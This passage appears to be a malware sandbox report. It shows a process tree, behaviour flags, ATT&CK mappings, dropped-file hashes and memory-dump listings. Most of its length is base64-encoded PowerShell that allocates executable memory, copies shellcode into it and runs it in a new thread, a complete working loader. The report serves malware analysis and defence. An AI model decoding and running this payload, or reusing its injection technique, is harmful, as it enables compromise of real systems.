0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABzAHUAawAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAdQBrACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkADUALAAwAHgAYgBhACwAMAB4ADQANwAsADAAeAA1AGYALAAwAHgANwA5ACwAMAB4ADYANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAYgAyACwAMAB4AGEAMwAsADAAeAA5ADEALAAwAHgAZQA4ACwAMAB4ADMAYwAsADAAeAA1AGMALAAwAHgANgAyACwAMAB4ADkANwAsADAAeAAwAGQALAAwAHgAOABlACwAMAB4ADAANgAsADAAeABkAGMALAAwAHgAMwBmACwAMAB4ADEAZQAsADAAeAA0AGMALAAwAHgAYgAwACwAMAB4AGIAMwAsADAAeABkADUALAAwAHgAMAAwACwAMAB4ADIAMQAsADAAeAA0ADIALAAwAHgAMABjACwAMAB4ADkANQAsADAAeABiADYALAAwAHgAZABmACwAMAB4AGIAZAAsADAAeABmAGUALAAwAHgANAA3ACwAMAB4ADYAOAAsADAAeAAwAGIALAAwAHgAZAA5ACwAMAB4ADYANgAsADAAeAA1ADYALAAwAHgAMgAwACwAMAB4ADEAOQAsADAAeABlADgALAAwAHgAMgBhACwAMAB4ADMAYgAsADAAeAA0AGUALAAwAHgAYwBhACwAMAB4ADEAMwAsADAAeABmADQALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADQALAAwAHgANAAyACwAMAB4AGUAOQAsADAAeABlADQALAAwAHgAMAA4ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAYQA5ACwAMAB4AGIAYwAsADAAeAAyADcALAAwAHgAZABlACwAMAB4ADcAMQAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADUANAAsADAAeABjADkALAAwAHgAYwA1ACwAMAB4ADgAMgAsADAAeABhAGIALAAwAHgAYgBlACwAMAB4ADcAOQAsADAAeAA4AGMALAAwAHgAZgBiACwAMAB4ADYAZgAsADAAeAAwAGEALAAwAHgAYwA2ACwAMAB4AGUAMwAsADAAeAAwADQALAAwAHgANQA0ACwAMAB4AGYANwAsADAAeAAxADIALAAwAHgAYwA4ACwAMAB4AGUAMQAsADAAeAAzAGUALAAwAHgANgAwACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgANABiACwAMAB4AGIAZAAsADAAeABhADEALAAwAHgAMAAzACwAMAB4AGIAMwAsADAAeABiAGYALAAwAHgANgAzACwAMAB4ADUAMgAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4ADQANAAsADAAeAA5ADkALAAwAHgAYQA3ACwAMAB4ADgAMwAsADAAeAA5AGMALAAwAHgAOQA5ACwAMAB4ADUANwAsADAAeABmADYALAAwAHgAZAA2ACwAMAB4AGQAYQAsADAAeABlAGEALAAwAHgAMAAxACwAMAB4ADIAZAAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADgANwAsADAAeABiADIALAAwAHgAMAAxACwAMAB4AGIAMgAsADAAeAAzAGYALAAwAHgAMQA3ACwAMAB4AGIAMAAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGQAYwAsADAAeABiAGUALAAwAHgAZABjACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgAYQAyACwAMAB4AGUAMwAsADAAeAA2ADIALAAwAHgAYgAwACwAMAB4AGQAZQAsADAAeAA2ADgALAAwAHgAOAA1ACwAMAB4ADEANwAsADAAeAA1ADcALAAwAHgAMgBhACwAMAB4AGEAMgAsADAAeABiADMALAAwAHgAMwBjACwAMAB4AGUAOAAsADAAeABjAGIALAAwAHgAZQAyACwAMAB4ADkAOAAsADAAeAA1AGYALAAwAHgAZgAzACwAMAB4AGYANQAsADAAeAA0ADQALAAwAHgAMwBmACwAMAB4ADUAMQAsADAAeAA3AGQALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeABlADUALAAwAHgANwBlACwAMAB4ADcAOQAsADAAeAA1ADcALAAwAHgAYgBiACwAMAB4AGUAOAAsADAAeABlAGIALAAwAHgAYwBkACwAMAB4ADMAMAAsADAAeABlADkALAAwAHgAOQBiACwAMAB4ADcAYQAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4ADMAMgAsADAAeABkADEALAAwAHgANABhACwAMAB4ADEANAAsADAAeABiADMALAAwAHgAZgBmACwAMAB4ADgAZAAsADAAeAA1AGIALAAwAHgAZQBlACwAMAB4ADMAMQAsADAAeAA0ADkALAAwAHgAZgAwACwAMAB4ADQAMwAsADAAeAA2ADEALAAwAHgAMwBlACwAMAB4AGEANAAsADAAeAAwAGIALAAwAHgAYgBmACwAMAB4ADkANgAsADAAeAAzADMALAAwAHgANgBjACwAMAB4ADQAMAAsADAAeABjADMALAAwAHgAOQA3ACwAMAB4ADIAMQAsADAAeABkADUALAAwAHgAZQBmACwAMAB4ADQANAAsADAAeAA5ADYALAAwAHgANAAxACwAMAB4ADYAMAAsADAAeAA3ADUALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADEAOAAsADAAeAA5ADIALAAwAHgANgA4ACwAMAB4ADEANAAsADAAeAA0AGQALAAwAHgAYwBiACwAMAB4ADUAYQAsADAAeAAwADAALAAwAHgAMAA3ACwAMAB4AGIAYwAsADAAeABiADcALAAwAHgAYgBkACwAMAB4ADgAMwAsADAAeAAyADYALAAwAHgAYQA5ACwAMAB4ADYAOQAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADYAMAAsADAAeABlADEALAAwAHgANABlACwAMAB4ADQAMwAsADAAeAAwADIALAAwAHgAMwA0ACwAMAB4AGMAMAAsADAAeAAxADIALAAwAHgAZAA1ACwAMAB4ADQAMwAsADAAeAAxADEALAAwAHgAZQBmACwAMAB4ADIAYwAsADAAeABlADAALAAwAHgANgA5ACwAMAB4ADAAZgAsADAAeAAxAGYALAAwAHgAOQAwACwAMAB4AGQAZQAsADAAeAA4ADYALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeAAxAGYALAAwAHgANABkACwAMAB4AGIANwAsADAAeABlADEALAAwAHgAOABjACwAMAB4ADAANgAsADAAeABjADgALAAwAHgAZABmACwAMAB4AGQAYQAsADAAeAA1ADMALAAwAHgAOQBiACwAMAB4ADQAYwAsADAAeAA0ADkALAAwAHgAMABiACwAMAB4ADQAZgAsADAAeAAyADUALAAwAHgAMAA1ACwAMAB4ADUAOAAsADAAeAAzAGEALAAwAHgAZQA3ACwAMAB4AGUAZQAsADAAeAA2ADEALAAwAHgAMQAwACwAMAB4ADYAMQAsADAAeAA3AGEALAAwAHgAOQA0ACwAMAB4AGMANAAsADAAeABlADYALAAwAHgAZgBhACwAMAB4ADkAYgAsADAAeABmAGEALAAwAHgAZgA2ACwAMAB4ADcAMwAsADAAeAAzAGIALAAwAHgAOQAwACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAZAA2ACwAMAB4ADcAYQAsADAAeABhAGQALAAwAHgAYgBiACwAMAB4ADUAMwAsADAAeABjADMALAAwAHgAYwBmACwAMAB4AGIAZAAsADAAeAA2ADMALAAwAHgAMQBlACwAMAB4AGIAYwAsADAAeAA5ADIALAAwAHgAYwA4ACwAMAB4AGYAMgAsADAAeAAxADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABmADIALAAwAHgAOAAxACwAMAB4ADAANwAsADAAeABlADMALAAwAHgAMgBlACwAMAB4ADMANAAsADAAeAAzADcALAAwAHgANgBlACwAMAB4AGMANwAsADAAeAA1AGYALAAwAHgAMwBmACwAMAB4ADgAMgAsADAAeABlADcALAAwAHgAOQBmACwAMAB4ADUANwAsADAAeABlADEALAAwAHgAMQA3ACwAMAB4AGEAYQAsADAAeAA0ADcALAAwAHgAMQA2ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAZgAyACwAMAB4ADIANAAsADAAeABjADUALAAwAHgAZAA1ACwAMAB4ADQAOQAsADAAeAAxADQALAAwAHgANAAwACwAMAB4AGUAOQAsADAAeAA2ADQALAAwAHgAMwAzACwAMAB4ADIAZAAsADAAeAA3AGQALAAwAHgAOAA2ACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgANwBkACwAMAB4AGUAZQAsADAAeABkADQALAAwAHgAYQBkACwAMAB4ADMAZAAsADAAeABlAGUALAAwAHgAOAA3ACwAMAB4AGMANQAsADAAeABlADUALAAwAHgANABhACwAMAB4ADcANAAsADAAeABmADMALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeABlADgALAAwAHgAYQA4ACwAMAB4ADQANgAsADAAeABlAGUALAAwAHgAZQA4ACwAMAB4ADEAOAAsADAAeAAwADEALAAwAHgAZgAwACwAMAB4AGQANgAsADAAeABhADYALAAwAHgAZAAxACwAMAB4AGEAMwAsADAAeAA0ADAALAAwAHgAYwBmACwAMAB4AGMAMwAsADAAeABkADUALAAwAHgAZQA0ACwAMAB4AGUAZAAsADAAeAAxAGIALAAwAHgAMABjACwAMAB4ADcAMwAsADAAeAAzADEALAAwAHgAOQA3ACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAYgA1ACwAMAB4ADUAOQAsADAAeABiADgALAAwAHgAOABkACwAMAB4ADcAYQAsADAAeAAyAGMALAAwAHgAZABiACwAMAB4AGQANgAsADAAeABiADkALAAwAHgAOQAwACwAMAB4AGMAYgAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4AGQAMAAsADAAeABmADQALAAwAHgANgAwACwAMAB4ADAANAAsADAAeAAxAGQALAAwAHgAMgA0ACwAMAB4AGIAMgAsADAAeAA0ADAALAAwAHgANQA5ACwAMAB4ADEANgAsADAAeAA4ADUALAAwAHgAOQA0ACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZAA3ACwAMAB4AGQAZAAsADAAeABjADcAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHUAUwBsAGsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHUAUwBsAGsALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHUAUwBsAGsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:648
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\teyd2rfo\teyd2rfo.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1684
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FAB.tmp" "c:\Users\Admin\AppData\Local\Temp\teyd2rfo\CSC3C516528BEE4C4180D831693FF0E824.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9FAB.tmp

Filesize
1KB

MD5
4d4f40f73b0d2db11f8b50ab89e4d15a

SHA1
d61ae9ef7a94e5f7c3a2a5937893a6660ef3950b

SHA256
7eaed7e5022ab6bf221b0385c0857ef4450c85e4c0c7a97e9d40fceba275238e

SHA512
e5b75e32f7bff9272eabc2411a576fb5632182ec925309e4a8204ce3dedec661e0bc2777aeb40761fb1c7e614cbb60e553733e544990746f4950e96a380e35f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppcykbc0.jb0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\teyd2rfo\teyd2rfo.dll

Filesize
3KB

MD5
8eac591152569cb0f3a3a77123cb006d

SHA1
7f463969d4b408b8be7f8b8c41318f901b85d166

SHA256
271f78ab77eb637ee3d6d9671ef74c4f597b387a937b5af94944d032c3c4e0e7

SHA512
8826717ae5bfc23b05d69cb27c3f4a1ed9c7e7b490fd4a86fb6f0e2c809f2332503296048aa54dafaa128b35d9555e20d7049a2a8f221c2c66b9da5492685848

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\teyd2rfo\CSC3C516528BEE4C4180D831693FF0E824.TMP

Filesize
652B

MD5
3d7540ab4a93dcb9b7004c19e7b2fbb2

SHA1
4dcd32dd67ee83028dca3933ec34e723d52dd277

SHA256
ea53d01f68def8ec7942fd27ed0bef3ce9ab69f134a97b5c6b1fbd230313f062

SHA512
6fb377d5e8133945bdcda429c0f7c2574d3c63a493f8a7570a074fc8b75d0ba7e56e9f2faee126a45243edaba6011d46576cbf94761db2532879aa4d1a8ca71e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\teyd2rfo\teyd2rfo.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\teyd2rfo\teyd2rfo.cmdline

Filesize
369B

MD5
b9de9764f06f3e64ce2e24e674afeaaf

SHA1
bd4f64dded86f5060320979bfcc3116bf9044e57

SHA256
8bc5baa1f6b78f3dfabd5a7a9aed0d3fbaa794aa4998160289bd00b4df566502

SHA512
d8a941732aa05d175bdf803c7e8b7f9fab9d35fb2d554aa8ffd23f9b3c30d69d02e7947aa46576db9712e8135f74f09150a342ab9b3485b54d1b333bb877049d

Download Submit
memory/648-38-0x0000000005D60000-0x0000000005DC6000-memory.dmp

Filesize
408KB

Download
memory/648-65-0x0000000006A20000-0x0000000006A28000-memory.dmp

Filesize
32KB

Download
memory/648-34-0x0000000002F20000-0x0000000002F56000-memory.dmp

Filesize
216KB

Download
memory/648-35-0x0000000005650000-0x0000000005C78000-memory.dmp

Filesize
6.2MB

Download
memory/648-36-0x00000000055C0000-0x00000000055E2000-memory.dmp

Filesize
136KB

Download
memory/648-37-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/648-67-0x0000000006AC0000-0x0000000006AC1000-memory.dmp

Filesize
4KB

Download
memory/648-48-0x0000000005E80000-0x00000000061D4000-memory.dmp

Filesize
3.3MB

Download
memory/648-49-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/648-50-0x00000000064D0000-0x000000000651C000-memory.dmp

Filesize
304KB

Download
memory/648-52-0x00000000069B0000-0x00000000069CA000-memory.dmp

Filesize
104KB

Download
memory/648-51-0x0000000007B10000-0x000000000818A000-memory.dmp

Filesize
6.5MB

Download
memory/3580-0-0x00007FFD64E23000-0x00007FFD64E25000-memory.dmp

Filesize
8KB

Download
memory/3580-12-0x00007FFD64E20000-0x00007FFD658E1000-memory.dmp

Filesize
10.8MB

Download
memory/3580-11-0x00007FFD64E20000-0x00007FFD658E1000-memory.dmp

Filesize
10.8MB

Download
memory/3580-6-0x000002077FAF0000-0x000002077FB12000-memory.dmp

Filesize
136KB

Download
memory/3580-68-0x00007FFD64E20000-0x00007FFD658E1000-memory.dmp

Filesize
10.8MB

Download
memory/4984-22-0x00007FFD64E20000-0x00007FFD658E1000-memory.dmp

Filesize
10.8MB

Download
memory/4984-23-0x00007FFD64E20000-0x00007FFD658E1000-memory.dmp

Filesize
10.8MB

Download
memory/4984-24-0x00007FFD64E20000-0x00007FFD658E1000-memory.dmp

Filesize
10.8MB

Download
memory/4984-69-0x00007FFD64E20000-0x00007FFD658E1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads